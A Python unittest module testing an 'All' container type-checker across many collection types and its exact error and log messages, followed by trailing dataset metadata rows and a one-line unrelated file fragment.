        AllStr = All(str)  # fixed missing space around '=' (PEP 8)
        lst = AllStr(['f', 'o', 'o'])  # renamed from ambiguous 'l' (E741)
        self.assertListEqual(lst, ['f', 'o', 'o'])

    def test_works_with_deque(self):
        AllStr = All(str)  # fixed missing space around '=' (PEP 8)
        dq = AllStr(deque(['f', 'o', 'o']))
        self.assertIsInstance(dq, deque)
        self.assertEqual(dq, deque(['f', 'o', 'o']))

    def test_works_with_set(self):
        AllStr = All(str)
        # {'f', 'o', 'o'} collapses to {'f', 'o'}: sets deduplicate.
        s = AllStr({'f', 'o', 'o'})
        self.assertSetEqual(s, {'f', 'o'})

    def test_works_with_frozenset(self):
        AllStr = All(str)
        s = AllStr(frozenset({'f', 'o', 'o'}))
        self.assertSetEqual(s, {'f', 'o'})

    def test_works_with_dict(self):
        AllStr = All(str)
        d = AllStr({'f': 1, 'o': 2})
        self.assertDictEqual(d, {'f': 1, 'o': 2})

    def test_works_ordered_dict(self):
        AllStr = All(str)
        od = AllStr(OrderedDict({'f': 1, 'o': 2}))
        self.assertIsInstance(od, OrderedDict)
        self.assertDictEqual(od, {'f': 1, 'o': 2})

    def test_works_with_defaultdict(self):
        AllStr = All(str)
        dd = AllStr(defaultdict(int, {'f': 1, 'o': 2}))
        self.assertDictEqual(dd, {'f': 1, 'o': 2})

    def test_works_with_dict_keys(self):
        AllStr = All(str)
        d = AllStr({'f': 1, 'o': 2}.keys())
        self.assertIsInstance(d, type({}.keys()))
        self.assertSetEqual(set(d), set({'f': 1, 'o': 2}.keys()))

    def test_works_with_ordered_dict_keys(self):
        AllStr = All(str)
        od = OrderedDict({'f': 1, 'o': 2})
        output = AllStr(od.keys())
        self.assertIsInstance(output, type(od.keys()))
        self.assertSetEqual(set(od.keys()), set(output))

    def test_works_with_defaultdict_keys(self):
        AllStr = All(str)
        dd = defaultdict(int, {'f': 1, 'o': 2})
        output = AllStr(dd.keys())
        self.assertIsInstance(output, type(dd.keys()))
        self.assertSetEqual(set(dd.keys()), set(output))

    def test_works_with_dict_values(self):
        AllInt = All(int)
        d = AllInt({'f': 1, 'o': 2}.values())
        self.assertIsInstance(d, type({}.values()))
        self.assertSetEqual(set(d), set({'f': 1, 'o': 2}.values()))

    def test_works_with_ordered_dict_values(self):
        AllInt = All(int)
        od = OrderedDict({'f': 1, 'o': 2})
        output = AllInt(od.values())
        self.assertIsInstance(output, type(od.values()))
        self.assertSetEqual(set(od.values()), set(output))

    def test_works_with_defaultdict_values(self):
        AllInt = All(int)
        dd = defaultdict(int, {'f': 1, 'o': 2})
        output = AllInt(dd.values())
        self.assertIsInstance(output, type(dd.values()))
        self.assertSetEqual(set(dd.values()), set(output))

    def test_returns_correct_type_with_two_types(self):
        AllNum = All(int, float)
        i = AllNum((1, ))
        self.assertIsInstance(i, tuple)
        f = AllNum([1.0])
        self.assertIsInstance(f, list)

    def test_returns_correct_value_with_two_types(self):
        AllNum = All(int, float)
        self.assertTupleEqual(AllNum((2, )), (2, ))
        self.assertListEqual(AllNum([2.0]), [2.0])
class TestAllErrorUnnamedOneType(ut.TestCase):
    """Error paths for All with ONE required type and UNNAMED inputs.

    Every test pins both the log record emitted at ERROR level and the
    exact text of the raised exception; the messages embed the repr of
    the offending container, so the string literals must stay verbatim.
    """

    def test_error_on_unnamed_variable_not_iterable(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Variable 3 with type int does not seem'
                   ' to be an iterable with elements to inspect!']
        err_msg = ('Variable 3 with type int does not seem to'
                   ' be an iterable with elements to inspect!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(IterError) as err:
                _ = AllInt(3)
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_named_variable_not_iterable(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Variable test with type int does not '
                   'seem to be an iterable with elements to inspect!']
        err_msg = ('Variable test with type int does not seem '
                   'to be an iterable with elements to inspect!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(IterError) as err:
                _ = AllInt(3, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_tuple_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element 1 in tuple (4,'
                   ' 5.0) must be int, not float like 5.0!']
        err_msg = ('Type of element 1 in tuple (4, 5.0)'
                   ' must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt((4, 5.0))
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_list_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element 1 in list [4,'
                   ' 5.0] must be int, not float like 5.0!']
        err_msg = ('Type of element 1 in list [4, 5.0]'
                   ' must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt([4, 5.0])
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_deque_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element 1 in deque([4,'
                   ' 5.0]) must be int, not float like 5.0!']
        err_msg = ('Type of element 1 in deque([4, 5.0])'
                   ' must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(deque([4, 5.0]))
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_dict_with_one_type(self):
        # For mappings the KEYS are type-checked, hence "key in dict".
        AllInt = All(int)
        inputs = {4: 'four', 5.0: 'five'}
        log_msg = ["ERROR:root:Type of key in dict {4: 'four', "
                   "5.0: 'five'} must be int, not float like 5.0!"]
        err_msg = ("Type of key in dict {4: 'four', 5.0: "
                   "'five'} must be int, not float like 5.0!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs)
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_ordered_dict_with_one_type(self):
        AllInt = All(int)
        inputs = OrderedDict({4: 'four', 5.0: 'five'})
        log_msg = ["ERROR:root:Type of key in OrderedDict([(4, 'four'),"
                   " (5.0, 'five')]) must be int, not float like 5.0!"]
        err_msg = ("Type of key in OrderedDict([(4, 'four'), (5.0,"
                   " 'five')]) must be int, not float like 5.0!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs)
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_defaultdict_with_one_type(self):
        AllInt = All(int)
        inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
        log_msg = ["ERROR:root:Type of key in defaultdict(<class 'str'>, {4:"
                   " 'four', 5.0: 'five'}) must be int, not float like 5.0!"]
        err_msg = ("Type of key in defaultdict(<class 'str'>, {4: 'four',"
                   " 5.0: 'five'}) must be int, not float like 5.0!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs)
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_dict_key_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of key in dict_keys([4,'
                   ' 5.0]) must be int, not float like 5.0!']
        err_msg = ('Type of key in dict_keys([4, 5.0])'
                   ' must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt({4: 'four', 5.0: 'five'}.keys())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_ordered_dict_key_with_one_type(self):
        # Message names the view type 'odict_keys' for OrderedDict views.
        AllInt = All(int)
        inputs = OrderedDict({4: 'four', 5.0: 'five'})
        log_msg = ['ERROR:root:Type of key in odict_keys([4,'
                   ' 5.0]) must be int, not float like 5.0!']
        err_msg = ('Type of key in odict_keys([4, 5.0])'
                   ' must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs.keys())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_defaultdict_key_with_one_type(self):
        # defaultdict reuses the plain 'dict_keys' view type.
        AllInt = All(int)
        inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
        log_msg = ['ERROR:root:Type of key in dict_keys([4,'
                   ' 5.0]) must be int, not float like 5.0!']
        err_msg = ('Type of key in dict_keys([4, 5.0])'
                   ' must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs.keys())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_dict_values_with_one_type(self):
        AllStr = All(str)
        log_msg = ["ERROR:root:Type of value in dict_values(['four', 5])"
                   " must be str, not int like 5!"]
        err_msg = ("Type of value in dict_values(['four', 5])"
                   " must be str, not int like 5!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllStr({4: 'four', 5.0: 5}.values())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_ordered_dict_values_with_one_type(self):
        AllStr = All(str)
        inputs = OrderedDict({4: 'four', 5.0: 5})
        log_msg = ["ERROR:root:Type of value in odict_values(['four', 5])"
                   " must be str, not int like 5!"]
        err_msg = ("Type of value in odict_values(['four', 5])"
                   " must be str, not int like 5!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllStr(inputs.values())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_defaultdict_values_with_one_type(self):
        AllStr = All(str)
        inputs = defaultdict(str, {4: 'four', 5.0: 5})
        log_msg = ["ERROR:root:Type of value in dict_values(['four', 5])"
                   " must be str, not int like 5!"]
        err_msg = ("Type of value in dict_values(['four', 5])"
                   " must be str, not int like 5!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllStr(inputs.values())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_set_with_one_type(self):
        AllInt = All(int)
        log_msg = ["ERROR:root:Type of element in set {4, "
                   "5.0} must be int, not float like 5.0!"]
        err_msg = ("Type of element in set {4, 5.0} must"
                   " be int, not float like 5.0!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt({4, 5.0})
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_frozenset_with_one_type(self):
        AllInt = All(int)
        log_msg = ["ERROR:root:Type of element in frozenset({4, "
                   "5.0}) must be int, not float like 5.0!"]
        err_msg = ("Type of element in frozenset({4, 5.0}) must"
                   " be int, not float like 5.0!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(frozenset({4, 5.0}))
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)
class TestAllErrorNamedOneType(ut.TestCase):
    """Error paths for All with ONE required type and NAMED inputs.

    When a name is passed as second argument, the error messages refer to
    the name ('test') instead of embedding the container's repr.
    """

    def test_error_on_wrong_named_tuple_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element 1 in tuple '
                   'test must be int, not float like 5.0!']
        err_msg = ('Type of element 1 in tuple test '
                   'must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt((4, 5.0), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_list_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element 1 in list '
                   'test must be int, not float like 5.0!']
        err_msg = ('Type of element 1 in list test '
                   'must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt([4, 5.0], 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_deque_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element 1 in deque '
                   'test must be int, not float like 5.0!']
        err_msg = ('Type of element 1 in deque test '
                   'must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(deque([4, 5.0]), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_dict_with_one_type(self):
        AllInt = All(int)
        inputs = {4: 'four', 5.0: 'five'}
        log_msg = ['ERROR:root:Type of key in dict test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of key in dict test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_ordered_dict_with_one_type(self):
        AllInt = All(int)
        inputs = OrderedDict({4: 'four', 5.0: 'five'})
        log_msg = ['ERROR:root:Type of key in OrderedDict test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of key in OrderedDict test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_defaultdict_with_one_type(self):
        AllInt = All(int)
        inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
        log_msg = ['ERROR:root:Type of key in defaultdict test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of key in defaultdict test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_dict_keys_with_one_type(self):
        # Named key views are reported simply as 'dict' in the message.
        AllInt = All(int)
        inputs = {4: 'four', 5.0: 'five'}
        log_msg = ['ERROR:root:Type of key in dict test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of key in dict test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs.keys(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_ordered_dict_keys_with_one_type(self):
        AllInt = All(int)
        inputs = OrderedDict({4: 'four', 5.0: 'five'})
        log_msg = ['ERROR:root:Type of key in dict test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of key in dict test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs.keys(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_defaultdict_keys_with_one_type(self):
        AllInt = All(int)
        inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
        log_msg = ['ERROR:root:Type of key in dict test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of key in dict test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(inputs.keys(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_dict_values_with_one_type(self):
        AllStr = All(str)
        inputs = {4: 'four', 5.0: 5}
        log_msg = ['ERROR:root:Type of value in dict '
                   'test must be str, not int like 5!']
        err_msg = ('Type of value in dict test '
                   'must be str, not int like 5!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllStr(inputs.values(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_ordered_dict_values_with_one_type(self):
        AllStr = All(str)
        inputs = OrderedDict({4: 'four', 5.0: 5})
        log_msg = ['ERROR:root:Type of value in dict '
                   'test must be str, not int like 5!']
        err_msg = ('Type of value in dict test '
                   'must be str, not int like 5!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllStr(inputs.values(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_defaultdict_values_with_one_type(self):
        AllStr = All(str)
        inputs = defaultdict(str, {4: 'four', 5.0: 5})
        log_msg = ['ERROR:root:Type of value in dict '
                   'test must be str, not int like 5!']
        err_msg = ('Type of value in dict test '
                   'must be str, not int like 5!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllStr(inputs.values(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_set_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element in set test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of element in set test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt({4, 5.0}, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_frozenset_with_one_type(self):
        AllInt = All(int)
        log_msg = ['ERROR:root:Type of element in frozenset test'
                   ' must be int, not float like 5.0!']
        err_msg = ('Type of element in frozenset test must'
                   ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllInt(frozenset({4, 5.0}), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)
class TestAllErrorTowTypes(ut.TestCase):
    """Error paths for All with TWO allowed types (int, float).

    Messages list the allowed types as a tuple: "one of ('int', 'float')".
    NOTE(review): class name typo — 'Tow' should be 'Two'; renaming would
    change unittest discovery IDs, so it is left as-is.
    """

    def test_error_on_wrong_unnamed_variable_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of element 2 in tuple (4, 5.0, 'bar')"
                   " must be one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of element 2 in tuple (4, 5.0, 'bar') must"
                   " be one of ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum((4, 5.0, 'bar'))
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_dict_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of key in dict {4: 'four', 'bar': 3}"
                   " must be one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of key in dict {4: 'four', 'bar': 3} must"
                   " be one of ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4: 'four', 'bar': 3})
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_dict_key_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of key in dict_keys([4, 'bar'])"
                   " must be one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of key in dict_keys([4, 'bar']) must"
                   " be one of ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4: 'four', 'bar': 3}.keys())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_dict_value_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of value in dict_values(['four', 3])"
                   " must be one of ('int', 'float'), not str like four!"]
        err_msg = ("Type of value in dict_values(['four', 3]) must"
                   " be one of ('int', 'float'), not str like four!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4: 'four', 'bar': 3}.values())
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_unnamed_set_with_two_types(self):
        # Set iteration order is unspecified, so only the error/log types
        # are asserted here, not the exact message text.
        AllNum = All(int, float)
        with self.assertLogs(level=logging.ERROR):
            with self.assertRaises(WrongTypeError):
                _ = AllNum({4, 'bar'})

    def test_error_on_wrong_unnamed_frozenset_with_two_types(self):
        AllNum = All(int, float)
        with self.assertLogs(level=logging.ERROR):
            with self.assertRaises(WrongTypeError):
                _ = AllNum(frozenset({4, 'bar'}))

    def test_error_on_wrong_named_variable_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of element 2 in tuple test must"
                   " be one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of element 2 in tuple test must be one"
                   " of ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum((4, 5.0, 'bar'), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_dict_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of key in dict test must be"
                   " one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of key in dict test must be one of"
                   " ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4: 'four', 5.0: 'five', 'bar': 3}, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_dict_key_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of key in dict test must be"
                   " one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of key in dict test must be one of"
                   " ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4: 'four', 5.0: 'five', 'bar': 3}.keys(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_dict_value_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of value in dict test must be"
                   " one of ('int', 'float'), not str like four!"]
        err_msg = ("Type of value in dict test must be one of"
                   " ('int', 'float'), not str like four!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4: 'four', 5.0: 'five', 'bar': 3}.values(), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_set_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of element in set test must be"
                   " one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of element in set test must be one of"
                   " ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum({4, 5.0, 'bar'}, 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)

    def test_error_on_wrong_named_frozenset_with_two_types(self):
        AllNum = All(int, float)
        log_msg = ["ERROR:root:Type of element in frozenset test must be"
                   " one of ('int', 'float'), not str like bar!"]
        err_msg = ("Type of element in frozenset test must be one of"
                   " ('int', 'float'), not str like bar!")
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as err:
                _ = AllNum(frozenset({4, 5.0, 'bar'}), 'test')
        self.assertEqual(str(err.exception), err_msg)
        self.assertEqual(log.output, log_msg)
class TestAllMethods(ut.TestCase):
    """Composition API of All: per-iterable attributes, NonEmpty/JustLen,
    and the `o` composition operator.
    """

    def test_has_iterable_type_checker_attributes(self):
        checker = All(int, float)
        for itr in _REDUCED_ITER:
            self.assertTrue(hasattr(checker, itr.__name__))
        self.assertTrue(hasattr(checker, 'NonEmpty'))

    def test_iterable_type_checkers_are_type_CompositionOf(self):
        checker = All(int, float)
        for itr in _REDUCED_ITER:
            composed = getattr(checker, itr.__name__)
            self.assertIsInstance(composed, CompositionOf)
        self.assertIsInstance(checker.NonEmpty, CompositionOf)

    def test_has_attribute_NonEmpty(self):
        checker = All(int)
        self.assertTrue(hasattr(checker, 'NonEmpty'))

    def test_attribute_NonEmpty_is_type_CompositionOf(self):
        checker = All(int)
        self.assertIsInstance(checker.NonEmpty, CompositionOf)

    def test_has_attribute_JustLen(self):
        checker = All(int)
        self.assertTrue(hasattr(checker, 'JustLen'))

    def test_attribute_JustLen_is_type_CompositionOf(self):
        checker = All(int)
        self.assertIsInstance(checker.JustLen, CompositionOf)

    def test_works_through_type_and_non_empty_checkers(self):
        checker = All(int)
        expected_log = ['ERROR:root:Type of element 1 in tuple '
                        'test must be int, not float like 5.0!']
        expected_err = ('Type of element 1 in tuple test '
                        'must be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as ctx:
                _ = checker.NonEmpty.JustTuple((4, 5.0), 'test')
        self.assertEqual(str(ctx.exception), expected_err)
        self.assertEqual(log.output, expected_log)

    def test_works_through_dict_and_just_length_checkers(self):
        checker = All(int)
        bad_keys = {4: 'four', 5.0: 'five'}
        expected_log = ['ERROR:root:Type of key in dict test'
                        ' must be int, not float like 5.0!']
        expected_err = ('Type of key in dict test must'
                        ' be int, not float like 5.0!')
        with self.assertLogs(level=logging.ERROR) as log:
            with self.assertRaises(WrongTypeError) as ctx:
                _ = checker.JustLen.JustDict(bad_keys, 'test', length=2)
        self.assertEqual(str(ctx.exception), expected_err)
        self.assertEqual(log.output, expected_log)

    def test_has_attribute_o(self):
        checker = All(int)
        self.assertTrue(hasattr(checker, 'o'))

    def test_attribute_o_is_callable(self):
        checker = All(int)
        self.assertTrue(callable(checker.o))

    def test_o_returns_composition(self):
        inner = All(int)
        outer = All(int, float)
        self.assertIsInstance(inner.o(outer), CompositionOf)

    def test_o_raises_error_on_argument_not_callable(self):
        checker = All(int)
        expected = ('foo must be a callable that accepts (i) a value,'
                    ' (ii) an optional name for that value, and (iii)'
                    ' any number of keyword arguments!')
        with self.assertRaises(CallableError) as ctx:
            _ = checker.o('foo')
        self.assertEqual(str(ctx.exception), expected)
if __name__ == '__main__':
    # Allow running this test module directly via unittest's CLI runner.
    ut.main()
| 45.277556
| 79
| 0.59993
| 4,621
| 34,094
| 4.254058
| 0.033759
| 0.01109
| 0.021976
| 0.029301
| 0.880456
| 0.857615
| 0.833299
| 0.816105
| 0.793061
| 0.779428
| 0
| 0.015518
| 0.277996
| 34,094
| 752
| 80
| 45.337766
| 0.783068
| 0
| 0
| 0.589666
| 0
| 0.00152
| 0.205989
| 0.001232
| 0
| 0
| 0
| 0
| 0.337386
| 1
| 0.121581
| false
| 0
| 0.010638
| 0
| 0.141337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91fa15827187db8b09f525073dd6fe44418d18f3
| 24
|
py
|
Python
|
emmer/__init__.py
|
blha303/emmer
|
1435310b2b4e63844700cbe26746d5c7ee0008e0
|
[
"MIT"
] | 10
|
2015-01-11T20:53:46.000Z
|
2021-07-13T10:56:44.000Z
|
emmer/__init__.py
|
blha303/emmer
|
1435310b2b4e63844700cbe26746d5c7ee0008e0
|
[
"MIT"
] | null | null | null |
emmer/__init__.py
|
blha303/emmer
|
1435310b2b4e63844700cbe26746d5c7ee0008e0
|
[
"MIT"
] | 6
|
2015-03-29T21:19:17.000Z
|
2020-11-18T18:32:47.000Z
|
from emmer import Emmer
| 12
| 23
| 0.833333
| 4
| 24
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
62080f83979b7cb245b1c964fa26ff140c7ecee7
| 142
|
py
|
Python
|
ZhiHu-Spider/database/__init__.py
|
xll-1994/ZhiHuSpider
|
f211cc24ad11ca632d0654812e17dd98088683cd
|
[
